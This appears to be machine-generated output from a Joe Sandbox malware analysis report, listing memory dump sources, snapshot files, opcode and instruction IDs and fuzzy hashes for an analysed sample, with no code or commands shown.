                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a856c616fe4a416d9def087ec60527cd12caa699849b2be9f5bbc88c0814a368
                                                                                                                                              • Instruction ID: fbd716bb77c05a36881fd40718a1bd0cfc284d3a92906247aac7232e690123ac
                                                                                                                                              • Opcode Fuzzy Hash: a856c616fe4a416d9def087ec60527cd12caa699849b2be9f5bbc88c0814a368
                                                                                                                                              • Instruction Fuzzy Hash: 7FC012301017184FD545F765FC9A515371EB6D0E11B408514940519A4FEF74A84957D1

Execution Graph

Execution Coverage: 11.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 162
Total number of Limit Nodes: 6

Memory Dump Source
• Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd

                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 201df1368c1b87ebc303d5fd8d0981dad5a189f2f90399a7d8b1194edb1e673d
                                                                                                                                              • Instruction ID: fcdb7fc0a5c9a56ec8bd30402487b9faa60de2c170a9b45b95566407a13d623d
                                                                                                                                              • Opcode Fuzzy Hash: 201df1368c1b87ebc303d5fd8d0981dad5a189f2f90399a7d8b1194edb1e673d
                                                                                                                                              • Instruction Fuzzy Hash: CB411975E01218EFCB04CFA9D440AEDBBF2FF8A301F14846AE815A7350DB349A45CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd0c3d6057aa85d1e8020863a8f6c6447da056ae46ec25c7d39215d36de3593c
                                                                                                                                              • Instruction ID: 37eb8e1e81dcb83c3f29e0b3e4164239e4ddf5e9a66d6f6946b0ca12a78785c1
                                                                                                                                              • Opcode Fuzzy Hash: cd0c3d6057aa85d1e8020863a8f6c6447da056ae46ec25c7d39215d36de3593c
                                                                                                                                              • Instruction Fuzzy Hash: A141CE7A9003418BDB10DF54D45039A7772BF82714F19857ACD0D7F38ADBB2694ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6cfbd960a313dbb5ad1ee9fe99c8284bfad8c987c17294acde06ff2646c10158
                                                                                                                                              • Instruction ID: 6e236f1cb212f9d628780c6cc40e6ae7c83177f7b2bdcbe250fd1c99629b3f0c
                                                                                                                                              • Opcode Fuzzy Hash: 6cfbd960a313dbb5ad1ee9fe99c8284bfad8c987c17294acde06ff2646c10158
                                                                                                                                              • Instruction Fuzzy Hash: 10419F759003118BDB50DF58D49039A7372BF82715F58847ACD0D7F38ADBB2A94ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 020894916a776d3bd9480986f99624f26ad5901f0a559006c370e1c202f974e1
                                                                                                                                              • Instruction ID: 067e135ce37806cb17011a47eefb39898ac2415d6f79cefb9f88985549c3ea15
                                                                                                                                              • Opcode Fuzzy Hash: 020894916a776d3bd9480986f99624f26ad5901f0a559006c370e1c202f974e1
                                                                                                                                              • Instruction Fuzzy Hash: C6412879B00619CFDB14CF24D885A6EBBB2BF89711F158569E8059B3A1CF30EC01CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da6a9b48a990760c14fbc02dd4ef3d26a15c4f4d6d6a77a4ccdf3502841ae767
                                                                                                                                              • Instruction ID: 293aed4f01ed0693b6ad1ced9e53b2c022a6d9160c3c4f3505e4abbb9b0cb519
                                                                                                                                              • Opcode Fuzzy Hash: da6a9b48a990760c14fbc02dd4ef3d26a15c4f4d6d6a77a4ccdf3502841ae767
                                                                                                                                              • Instruction Fuzzy Hash: 50313B75E00208EFCB09CFA5D8449EEBBB6FF89301F14856AE905A7350DB35AD46CB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e608bce87421286b65323139e881f429aec54c7633eb1c3709207a143d7dad79
                                                                                                                                              • Instruction ID: 6ee16bc74e0ee94ac714a15736d68a6f6dffa7e893fdf23cb0b3d54d9a3654ff
                                                                                                                                              • Opcode Fuzzy Hash: e608bce87421286b65323139e881f429aec54c7633eb1c3709207a143d7dad79
                                                                                                                                              • Instruction Fuzzy Hash: E531E375D00218EFDB04CFA4D448AEEBFB2FF89301F1581A9E515AB2A1C7759950DFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e91e57adaa4801a8de22456d1e9f072e069fa6b10fc62226563b57c3eac108bf
                                                                                                                                              • Instruction ID: 695d4e8444dd57b7cd66637a3622739116d1d6caf2c25b4868f24058219ade73
                                                                                                                                              • Opcode Fuzzy Hash: e91e57adaa4801a8de22456d1e9f072e069fa6b10fc62226563b57c3eac108bf
                                                                                                                                              • Instruction Fuzzy Hash: C2210230A08214EFEB069B759C02BAE7F7AFF86700F0488A6E541DB1C1DF745D469BA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b81aa1d6d9a9734b8a76c87f2a7e65d5156293a4b3aee82a7ddfa7516c2bd072
                                                                                                                                              • Instruction ID: 123e0797cc16c827ca691e59140af41cb80fc6039e4cfc8ce097591f8e8ead95
                                                                                                                                              • Opcode Fuzzy Hash: b81aa1d6d9a9734b8a76c87f2a7e65d5156293a4b3aee82a7ddfa7516c2bd072
                                                                                                                                              • Instruction Fuzzy Hash: 0E31CC32A00268DFDF05DFA4D854ADD7FB1FF49321F1409AAE501AB2A0CB319D85CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2600f5cd6ecc69f1a7bbd6d8926f2b08231d23e13300c61d9cd6e03605c2f092
                                                                                                                                              • Instruction ID: 81de27557f9a0ab790ae1cea7634028d964bf6b3924e511251d4f9a5ac29dbec
                                                                                                                                              • Opcode Fuzzy Hash: 2600f5cd6ecc69f1a7bbd6d8926f2b08231d23e13300c61d9cd6e03605c2f092
                                                                                                                                              • Instruction Fuzzy Hash: EB3193B5D012099FDB04DFA9D484ADDBFB1FF88351F10816AE919A7350DB345A46CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 05536b84a2d67a5c2c4d91b3eea177d6fdc44acc04a4fcffd336f85a24062f9b
                                                                                                                                              • Instruction ID: b8d8b3a1e2c05a32586aafccd55a9a1cffc3ae3f8463c764c4a1e7ff45ebd766
                                                                                                                                              • Opcode Fuzzy Hash: 05536b84a2d67a5c2c4d91b3eea177d6fdc44acc04a4fcffd336f85a24062f9b
                                                                                                                                              • Instruction Fuzzy Hash: 7B311675D00218DFDB08CFA9D844BEEBBB5FF89301F058169E505A7391C7799940CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9389f5449a8583b5058d06c41250656c02d4c46607612e86f314487bda3c497f
                                                                                                                                              • Instruction ID: f09cebc2020dcfea4d5a76e2b0b1725e18b8457fb78f27d06ecb99c20c6196e8
                                                                                                                                              • Opcode Fuzzy Hash: 9389f5449a8583b5058d06c41250656c02d4c46607612e86f314487bda3c497f
                                                                                                                                              • Instruction Fuzzy Hash: 223182B5D002099FDB08DFA9D4849DDBFB1FF88301F10816AE919A7350DB345A45CFA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 40ff3a2b1e0075c4cce58ed07f70b3a0d5039cc6bc60963e02722ac5c6332a7b
                                                                                                                                              • Instruction ID: c741a8048ffdc7a1c5639968f0ca876bd5f31ea04d7427e5b513f6bbfd19e6b8
                                                                                                                                              • Opcode Fuzzy Hash: 40ff3a2b1e0075c4cce58ed07f70b3a0d5039cc6bc60963e02722ac5c6332a7b
                                                                                                                                              • Instruction Fuzzy Hash: 57214A35A0021ACFCF10DFA8C484A6E7BB1FF46321F154469E805DB3A1DA30E885CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 42abe62bcb9b766ce3fe898768fdcd16e31f7b59483718fc1109c257b0958648
                                                                                                                                              • Instruction ID: a996cb942ff8afb6ed0e49eae8400f5fd9d558a6374e0cea01c69d10668fbf5e
                                                                                                                                              • Opcode Fuzzy Hash: 42abe62bcb9b766ce3fe898768fdcd16e31f7b59483718fc1109c257b0958648
                                                                                                                                              • Instruction Fuzzy Hash: 2021E575D00209EFCB09CFA5D8449DEBBB2FF89310F10812AE915AB360DB756956DF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1666300047.0000000008520000.00000040.00000800.00020000.00000000.sdmp, Offset: 08520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_8520000_vTAuFgZcVE.jbxd